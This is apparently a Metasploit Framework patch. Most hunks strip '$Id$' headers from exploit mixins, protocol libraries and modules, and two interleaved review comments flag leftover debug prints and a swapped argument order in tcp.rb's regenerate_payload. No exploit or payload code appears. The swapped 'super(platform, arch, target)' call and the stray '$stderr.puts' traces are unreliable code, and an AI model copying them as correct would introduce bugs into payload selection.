@@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb index c99d29064f..4cb43ff7e1 100644 --- a/lib/msf/core/exploit/cmdstager.rb +++ b/lib/msf/core/exploit/cmdstager.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/cmdstager' require 'msf/core/exploit/exe' diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb index 508307a25d..41b9bd43c8 100644 --- a/lib/msf/core/exploit/cmdstager_debug_asm.rb +++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb index 8b73ac8adf..964a5e8d00 100644 --- a/lib/msf/core/exploit/cmdstager_debug_write.rb +++ b/lib/msf/core/exploit/cmdstager_debug_write.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 5549a687bd..aae3b0bf2b 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'msf/core/exploit/tftp' diff --git a/lib/msf/core/exploit/cmdstager_vbs.rb b/lib/msf/core/exploit/cmdstager_vbs.rb index 1247d118a7..05ae9acc74 100644 --- a/lib/msf/core/exploit/cmdstager_vbs.rb +++ b/lib/msf/core/exploit/cmdstager_vbs.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb index b6a082a2a1..3a19611a2e 100644 --- a/lib/msf/core/exploit/cmdstager_vbs_adodb.rb 
+++ b/lib/msf/core/exploit/cmdstager_vbs_adodb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ require 'msf/core/exploit/cmdstager' diff --git a/lib/msf/core/exploit/dhcp.rb b/lib/msf/core/exploit/dhcp.rb index 455c204d84..baac9dec9f 100644 --- a/lib/msf/core/exploit/dhcp.rb +++ b/lib/msf/core/exploit/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' diff --git a/lib/msf/core/exploit/egghunter.rb b/lib/msf/core/exploit/egghunter.rb index 31db349cc1..20fc6f0988 100644 --- a/lib/msf/core/exploit/egghunter.rb +++ b/lib/msf/core/exploit/egghunter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/egghunter' diff --git a/lib/msf/core/exploit/exe.rb b/lib/msf/core/exploit/exe.rb index e4d632d0ef..49ee94e3e5 100644 --- a/lib/msf/core/exploit/exe.rb +++ b/lib/msf/core/exploit/exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb index 7de70ff6e9..39ea610dce 100644 --- a/lib/msf/core/exploit/fmtstr.rb +++ b/lib/msf/core/exploit/fmtstr.rb @@ -7,7 +7,6 @@ module Msf # in a more intelligent way. # # Author: jduck -# $Id$ ### module Exploit::FormatString diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb index 7be24e6aec..d6f81faf8d 100644 --- a/lib/msf/core/exploit/ipv6.rb +++ b/lib/msf/core/exploit/ipv6.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 709457ffa0..431488690d 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # All exploit mixins should be added to the list below # diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index b86e51e9a9..e8dd2ac0bf 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb 
@@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/core/exploit/omelet.rb b/lib/msf/core/exploit/omelet.rb index 41d7905fd4..e5945812a6 100644 --- a/lib/msf/core/exploit/omelet.rb +++ b/lib/msf/core/exploit/omelet.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/exploitation/omelet' diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 630d8dc579..9f3c4777d6 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/php_exe.rb b/lib/msf/core/exploit/php_exe.rb index 3c59f568ed..0a768a436e 100644 --- a/lib/msf/core/exploit/php_exe.rb +++ b/lib/msf/core/exploit/php_exe.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ### # diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb index 3681c0f2bf..57b7b167af 100644 --- a/lib/msf/core/exploit/riff.rb +++ b/lib/msf/core/exploit/riff.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 5a923427ec..a34f195744 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -468,6 +468,8 @@ module Exploit::Remote::TcpServer # def regenerate_payload(cli, arch = nil, platform = nil, target = nil) + $stderr.puts("Tcp##{__method__} : target: #{target.inspect}") + ohost = datastore['RHOST'] oport = datastore['RPORT'] p = nil @@ -477,7 +479,7 @@ module Exploit::Remote::TcpServer datastore['RHOST'] = cli.peerhost datastore['RPORT'] = cli.peerport - if ((p = super(arch, platform, target)) == nil) + if ((p = super(platform, arch, target)) == nil) print_error("Failed to generate payload") return nil end diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb index 8a7655055f..ba0b65bf24 100644 --- a/lib/msf/core/exploit/telnet.rb 
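Review bot: The added `$stderr.puts("Tcp##{__method__} : target: #{target.inspect}")` at the top of `regenerate_payload` is unconditional debug output in a shared mixin, so every module that includes it writes to the process's stderr, bypassing the framework's print and log helpers. The two `lib/msf/core/payload/generic.rb` hunks that follow have the same problem (`$stderr.puts "explicit"`, `"datastore"`, and the `assoc_exploit` dumps). The other visible hunks in this patch only strip `$Id$` headers, so these traces look like leftovers from a debugging session. I would drop them here or gate them behind the framework's verbose/debug logging. A later patch in the series removes them, so squashing that revert into this patch would keep them out of history altogether.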
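Review bot: `super(platform, arch, target)` passes its arguments in a different order from this method's own signature, `regenerate_payload(cli, arch = nil, platform = nil, target = nil)`, shown in the previous hunk. The parent's signature is not visible here, but if it takes `(arch, platform, target)` as the removed line assumed, the architecture and platform values are silently exchanged and payload selection runs with the wrong constraints. Unless the parent's parameter order really changed, keep `if ((p = super(arch, platform, target)) == nil)`. If it did change, that belongs in its own commit together with the parent's diff. The method body is only partly visible in these two hunks.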
+++ b/lib/msf/core/exploit/telnet.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/exploit/tftp.rb b/lib/msf/core/exploit/tftp.rb index c20250f5d8..a75ab290f4 100644 --- a/lib/msf/core/exploit/tftp.rb +++ b/lib/msf/core/exploit/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' diff --git a/lib/msf/core/exploit/wbemexec.rb b/lib/msf/core/exploit/wbemexec.rb index 660d29f45d..a8e8e89d01 100644 --- a/lib/msf/core/exploit/wbemexec.rb +++ b/lib/msf/core/exploit/wbemexec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # This mixin enables executing arbitrary commands via the diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb index c72cf13bf0..4691c7ed59 100644 --- a/lib/msf/core/payload/generic.rb +++ b/lib/msf/core/payload/generic.rb @@ -211,10 +211,13 @@ protected arch = nil if explicit_arch.nil? == false + $stderr.puts "explicit" arch = explicit_arch elsif datastore['ARCH'] + $stderr.puts "datastore" arch = datastore['ARCH'] elsif assoc_exploit + $stderr.puts "assoc_exploit" arch = assoc_exploit.target_arch || ARCH_X86 end @@ -233,6 +236,8 @@ protected # Look for one based on the exploit's compatible set if(assoc_exploit) + $stderr.puts "assoc_exploit #{assoc_exploit.name}" + $stderr.puts "#{actual_arch} #{actual_platform.inspect}" self.actual_payload = framework.payloads.find_payload_from_set( assoc_exploit.compatible_payloads, actual_platform, diff --git a/lib/msf/core/payload/windows/exec.rb b/lib/msf/core/payload/windows/exec.rb index 5ad8a42568..5e3f9b510a 100644 --- a/lib/msf/core/payload/windows/exec.rb +++ b/lib/msf/core/payload/windows/exec.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/payload/windows/loadlibrary.rb b/lib/msf/core/payload/windows/loadlibrary.rb index 05854d12df..dc128e3d18 100644 --- a/lib/msf/core/payload/windows/loadlibrary.rb 
+++ b/lib/msf/core/payload/windows/loadlibrary.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 0a112be7f7..f831730fe1 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: module.rb 12624 2011-05-15 23:51:53Z hdm $ -## module Msf module RPC diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 8b6a248384..65a41f1650 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/parser/arguments' diff --git a/lib/msf/windows_error.rb b/lib/msf/windows_error.rb index 94053f8e52..42c2d175fa 100644 --- a/lib/msf/windows_error.rb +++ b/lib/msf/windows_error.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## # # Windows system error codes (0-499) diff --git a/lib/rex/elfparsey.rb b/lib/rex/elfparsey.rb index a9f891066a..abe5e626ee 100644 --- a/lib/rex/elfparsey.rb +++ b/lib/rex/elfparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfparsey/elf.rb b/lib/rex/elfparsey/elf.rb index 9d9811f6d5..33061fe6e4 100644 --- a/lib/rex/elfparsey/elf.rb +++ b/lib/rex/elfparsey/elf.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/elfparsey/elfbase' require 'rex/elfparsey/exceptions' require 'rex/image_source' diff --git a/lib/rex/elfparsey/elfbase.rb b/lib/rex/elfparsey/elfbase.rb index be5691e2d8..d91ba7aee1 100644 --- a/lib/rex/elfparsey/elfbase.rb +++ b/lib/rex/elfparsey/elfbase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/struct2' module Rex 
diff --git a/lib/rex/elfparsey/exceptions.rb b/lib/rex/elfparsey/exceptions.rb index 4e3804424f..5437246afe 100644 --- a/lib/rex/elfparsey/exceptions.rb +++ b/lib/rex/elfparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfParsey diff --git a/lib/rex/elfscan.rb b/lib/rex/elfscan.rb index d3e66affbc..38c9706690 100644 --- a/lib/rex/elfscan.rb +++ b/lib/rex/elfscan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb index 115aa0977d..244ee7e728 100644 --- a/lib/rex/elfscan/scanner.rb +++ b/lib/rex/elfscan/scanner.rb @@ -1,7 +1,5 @@ # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Scanner diff --git a/lib/rex/elfscan/search.rb b/lib/rex/elfscan/search.rb index 80f7be017c..cb0e9292f1 100644 --- a/lib/rex/elfscan/search.rb +++ b/lib/rex/elfscan/search.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ElfScan module Search diff --git a/lib/rex/exploitation/cmdstager/tftp.rb b/lib/rex/exploitation/cmdstager/tftp.rb index 3607fb4ea7..e646e291f1 100644 --- a/lib/rex/exploitation/cmdstager/tftp.rb +++ b/lib/rex/exploitation/cmdstager/tftp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rex/arch' diff --git a/lib/rex/exploitation/jsobfu.rb b/lib/rex/exploitation/jsobfu.rb index 2c8d51299a..32bc87f640 100644 --- a/lib/rex/exploitation/jsobfu.rb +++ b/lib/rex/exploitation/jsobfu.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/text' require 'rkelly' diff --git a/lib/rex/image_source.rb b/lib/rex/image_source.rb index 1cf4a94a8d..f7f3ff1c44 100644 --- a/lib/rex/image_source.rb +++ b/lib/rex/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource 
diff --git a/lib/rex/image_source/disk.rb b/lib/rex/image_source/disk.rb index 0b3f5faa83..f37b7be47f 100644 --- a/lib/rex/image_source/disk.rb +++ b/lib/rex/image_source/disk.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/image_source/image_source.rb b/lib/rex/image_source/image_source.rb index 549388fc4e..4d6e428e06 100644 --- a/lib/rex/image_source/image_source.rb +++ b/lib/rex/image_source/image_source.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module ImageSource class ImageSource diff --git a/lib/rex/image_source/memory.rb b/lib/rex/image_source/memory.rb index c75be1881f..3f27990324 100644 --- a/lib/rex/image_source/memory.rb +++ b/lib/rex/image_source/memory.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source/image_source' require 'rex/struct2' diff --git a/lib/rex/ole.rb b/lib/rex/ole.rb index d2a0407134..38f6f4924a 100644 --- a/lib/rex/ole.rb +++ b/lib/rex/ole.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/clsid.rb b/lib/rex/ole/clsid.rb index e697dd121d..b6458c903e 100644 --- a/lib/rex/ole/clsid.rb +++ b/lib/rex/ole/clsid.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/difat.rb b/lib/rex/ole/difat.rb index 52ab121b4c..825a1089b4 100644 --- a/lib/rex/ole/difat.rb +++ b/lib/rex/ole/difat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/directory.rb b/lib/rex/ole/directory.rb index 4b91038686..464a073ebd 100644 --- a/lib/rex/ole/directory.rb +++ b/lib/rex/ole/directory.rb 
@@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/direntry.rb b/lib/rex/ole/direntry.rb index c6f634691a..a546a6e32b 100644 --- a/lib/rex/ole/direntry.rb +++ b/lib/rex/ole/direntry.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/fat.rb b/lib/rex/ole/fat.rb index 2edb3de8ac..0adc2aa30d 100644 --- a/lib/rex/ole/fat.rb +++ b/lib/rex/ole/fat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/header.rb b/lib/rex/ole/header.rb index b24eef4e31..a6341e7636 100644 --- a/lib/rex/ole/header.rb +++ b/lib/rex/ole/header.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/minifat.rb b/lib/rex/ole/minifat.rb index 1e9bbdb0e3..df2b073582 100644 --- a/lib/rex/ole/minifat.rb +++ b/lib/rex/ole/minifat.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/propset.rb b/lib/rex/ole/propset.rb index 8a1812d96c..f5c94a602a 100644 --- a/lib/rex/ole/propset.rb +++ b/lib/rex/ole/propset.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/storage.rb b/lib/rex/ole/storage.rb index 55f6259a60..fc6a15797a 100644 --- a/lib/rex/ole/storage.rb +++ b/lib/rex/ole/storage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/stream.rb b/lib/rex/ole/stream.rb index fd7e36d050..8d2ea7f3d5 100644 --- a/lib/rex/ole/stream.rb +++ b/lib/rex/ole/stream.rb 
@@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/substorage.rb b/lib/rex/ole/substorage.rb index 1e14440853..b60a8714fb 100644 --- a/lib/rex/ole/substorage.rb +++ b/lib/rex/ole/substorage.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/ole/util.rb b/lib/rex/ole/util.rb index 5712e598c8..90da72d3c9 100644 --- a/lib/rex/ole/util.rb +++ b/lib/rex/ole/util.rb @@ -1,8 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -# Version: $Revision$ -## ## # Rex::OLE - an OLE implementation diff --git a/lib/rex/peparsey.rb b/lib/rex/peparsey.rb index 6e6addffe7..22916826fd 100644 --- a/lib/rex/peparsey.rb +++ b/lib/rex/peparsey.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/exceptions.rb b/lib/rex/peparsey/exceptions.rb index 45951f8322..359b2807fd 100644 --- a/lib/rex/peparsey/exceptions.rb +++ b/lib/rex/peparsey/exceptions.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeParsey diff --git a/lib/rex/peparsey/pe.rb b/lib/rex/peparsey/pe.rb index 3966e06f0b..de895159e3 100644 --- a/lib/rex/peparsey/pe.rb +++ b/lib/rex/peparsey/pe.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pe_memdump.rb b/lib/rex/peparsey/pe_memdump.rb index 85f118f8c7..eef2ab7a53 100644 --- a/lib/rex/peparsey/pe_memdump.rb +++ b/lib/rex/peparsey/pe_memdump.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/image_source' require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb index bf268e6b36..5a3e5247b9 100644 --- a/lib/rex/peparsey/pebase.rb 
+++ b/lib/rex/peparsey/pebase.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/struct2' diff --git a/lib/rex/peparsey/section.rb b/lib/rex/peparsey/section.rb index 392b42f067..8110cc071e 100644 --- a/lib/rex/peparsey/section.rb +++ b/lib/rex/peparsey/section.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - require 'rex/peparsey/exceptions' require 'rex/peparsey/pebase' require 'rex/struct2' diff --git a/lib/rex/pescan.rb b/lib/rex/pescan.rb index 163c6f0db5..9483abc15f 100644 --- a/lib/rex/pescan.rb +++ b/lib/rex/pescan.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# $Id$ - module Rex module PeScan diff --git a/lib/rex/proto/dhcp.rb b/lib/rex/proto/dhcp.rb index 9a8a036f84..d28ae0bf8b 100644 --- a/lib/rex/proto/dhcp.rb +++ b/lib/rex/proto/dhcp.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # DHCP Server support written by scriptjunkie # diff --git a/lib/rex/proto/dhcp/constants.rb b/lib/rex/proto/dhcp/constants.rb index c99d74f1bc..96e2829691 100644 --- a/lib/rex/proto/dhcp/constants.rb +++ b/lib/rex/proto/dhcp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/dhcp' module Rex diff --git a/lib/rex/proto/dhcp/server.rb b/lib/rex/proto/dhcp/server.rb index abfd39d2d0..1dccbc0c09 100644 --- a/lib/rex/proto/dhcp/server.rb +++ b/lib/rex/proto/dhcp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/dhcp' diff --git a/lib/rex/proto/ntlm/crypt.rb b/lib/rex/proto/ntlm/crypt.rb index f7a99efcfb..3885f29b85 100644 --- a/lib/rex/proto/ntlm/crypt.rb +++ b/lib/rex/proto/ntlm/crypt.rb @@ -43,10 +43,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ - require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/base' 
diff --git a/lib/rex/proto/ntlm/message.rb b/lib/rex/proto/ntlm/message.rb index a8c678e877..efe5f7ec4d 100644 --- a/lib/rex/proto/ntlm/message.rb +++ b/lib/rex/proto/ntlm/message.rb @@ -40,9 +40,6 @@ # The latter has a minor bug in its separate_keys function. # The third key has to begin from the 14th character of the # input string instead of 13th:) -#-- -# $Id: ntlm.rb 11678 2011-01-30 19:26:35Z hdm $ -#++ #this module defines the message class , useful for easily handling type 1/2/3 ntlm messages diff --git a/lib/rex/proto/rfb.rb b/lib/rex/proto/rfb.rb index 378bc1428b..623f780b29 100644 --- a/lib/rex/proto/rfb.rb +++ b/lib/rex/proto/rfb.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id: $ # # RFB protocol support # diff --git a/lib/rex/proto/rfb.rb.ut.rb b/lib/rex/proto/rfb.rb.ut.rb index d06de6c4d2..cb9900de64 100644 --- a/lib/rex/proto/rfb.rb.ut.rb +++ b/lib/rex/proto/rfb.rb.ut.rb @@ -1,8 +1,6 @@ #!/usr/bin/env ruby # -*- coding: binary -*- # -# $Id: $ -# # RFB protocol support # # @author Joshua J. Drake diff --git a/lib/rex/proto/rfb/cipher.rb b/lib/rex/proto/rfb/cipher.rb index 7a0c37dbdb..ca54d19a2e 100644 --- a/lib/rex/proto/rfb/cipher.rb +++ b/lib/rex/proto/rfb/cipher.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/client.rb b/lib/rex/proto/rfb/client.rb index 723a067034..fd75160953 100644 --- a/lib/rex/proto/rfb/client.rb +++ b/lib/rex/proto/rfb/client.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/rfb/constants.rb b/lib/rex/proto/rfb/constants.rb index fc5517d8a3..868b6533f1 100644 --- a/lib/rex/proto/rfb/constants.rb +++ b/lib/rex/proto/rfb/constants.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id: $ -## ## # diff --git a/lib/rex/proto/tftp.rb b/lib/rex/proto/tftp.rb index 2ed08237e4..22e93f8bf7 100644 --- a/lib/rex/proto/tftp.rb +++ b/lib/rex/proto/tftp.rb 
@@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ # # TFTP Server implementation according to: # diff --git a/lib/rex/proto/tftp/constants.rb b/lib/rex/proto/tftp/constants.rb index d29894c8bf..476000afe4 100644 --- a/lib/rex/proto/tftp/constants.rb +++ b/lib/rex/proto/tftp/constants.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/proto/tftp' module Rex diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb index c01d18f9a9..7c9e3bee3a 100644 --- a/lib/rex/proto/tftp/server.rb +++ b/lib/rex/proto/tftp/server.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'rex/socket' require 'rex/proto/tftp' diff --git a/lib/rex/proto/tftp/server.rb.ut.rb b/lib/rex/proto/tftp/server.rb.ut.rb index b767e0c2e4..32a0647518 100755 --- a/lib/rex/proto/tftp/server.rb.ut.rb +++ b/lib/rex/proto/tftp/server.rb.ut.rb @@ -1,10 +1,5 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -# -# $Revision$ -# -# $Id$ -# require 'rex/compat' require 'rex/proto/tftp' diff --git a/lib/rex/zip/archive.rb b/lib/rex/zip/archive.rb index 0c69769aee..b8b068f75f 100644 --- a/lib/rex/zip/archive.rb +++ b/lib/rex/zip/archive.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 6774e73869..d589b99318 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index ff41196550..b063b6a72e 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Rex module Zip diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 2072b8545b..f77fe8c5af 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb 
@@ -1,6 +1,4 @@ -## -# $Id: drda.rb 14774 2012-02-21 01:42:17Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb index b3c33e892f..f98eed8595 100644 --- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 11b5d57c76..6900ed129a 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -1,6 +1,4 @@ -## -# $Id: $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 422b8f8392..ae8b61a428 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -1,6 +1,4 @@ -## -# $Id: jboss_deploymentfilerepository.rb 15620 2012-07-12 07:33:06Z rapid7 $ -## +# -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index bec17f874b..ea8fcce859 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ 